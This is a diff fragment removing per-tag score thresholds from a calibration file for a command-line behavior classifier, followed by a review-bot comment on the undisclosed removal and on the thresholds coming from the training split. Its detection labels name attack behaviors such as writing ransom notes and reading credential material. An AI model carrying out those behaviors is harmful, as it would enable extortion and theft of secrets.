1843
- },
1844
- "write_executable_content": {
1845
- "threshold": 0.5265,
1846
- "tp_p50": 0.6483,
1847
- "tp_samples": 555
1848
- },
1849
- "write_kernel_module_content": {
1850
- "threshold": 0.6192,
1851
- "tp_p50": 0.7012,
1852
- "tp_samples": 110
1853
- },
1854
- "write_ransom_note": {
1855
- "threshold": 0.7066,
1856
- "tp_p50": 0.7899,
1857
- "tp_samples": 119
1858
- },
1859
- "write_secret_store": {
1860
- "threshold": 0.6641,
1861
- "tp_p50": 0.732,
1862
- "tp_samples": 121
1863
- },
1864
- "write_shared_library_content": {
1865
- "threshold": 0.6284,
1866
- "tp_p50": 0.7173,
1867
- "tp_samples": 133
1868
- },
1869
- "write_system_executable_content": {
1870
- "threshold": 0.6197,
1871
- "tp_p50": 0.7028,
1872
- "tp_samples": 112
1873
- },
1874
- "write_web_script_content": {
1875
- "threshold": 0.6228,
1876
- "tp_p50": 0.7186,
1877
- "tp_samples": 142
1878
- }
1879
- },
1880
- "max_threshold": 0.95,
1881
- "min_label_samples": 5,
1882
- "model": "models/v4-tags-embedding/gte-modernbert-rev20-behavior-full-corpus/model",
1883
- "percentile": 10.0,
1884
- "prompt_profile": "mid",
1885
- "prompt_profile_experimental": false,
1886
- "query_prefix": "observed command line or audit event",
1887
- "runtime_seconds": 36.743,
1888
- "schema": "agentsmith_rev20_score_calibration_v1",
1889
- "split": "train",
1890
- "tag_prefix": "behavior tag definition"
1891
- }
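Review bot: the commit is titled as a docs polish, but the removed lines ending at 1891 delete the per-label score calibration itself, not documentation, and the change should say so and tell consumers what replaces it. The deleted entries carry a distinct `"threshold"` per behavior tag (in the visible lines from `0.45` for `read_credential_material` and `stage_temporary_path` up to `0.8531` for `remove_file_capability`), along with the `"percentile": 10.0`, `"min_label_samples": 5` and `"max_threshold": 0.95` settings recorded beside them, so any detection pipeline that read cut-offs from this file has no equivalent single global value to fall back on. Suggest stating in the commit message and model card that calibration metadata is withdrawn from the release and where per-label thresholds should now come from. If a calibration file is published again, note that this one records `"split": "train"`; thresholds taken from the training split tend to look better than they will on unseen command lines, so a held-out split would be the safer basis.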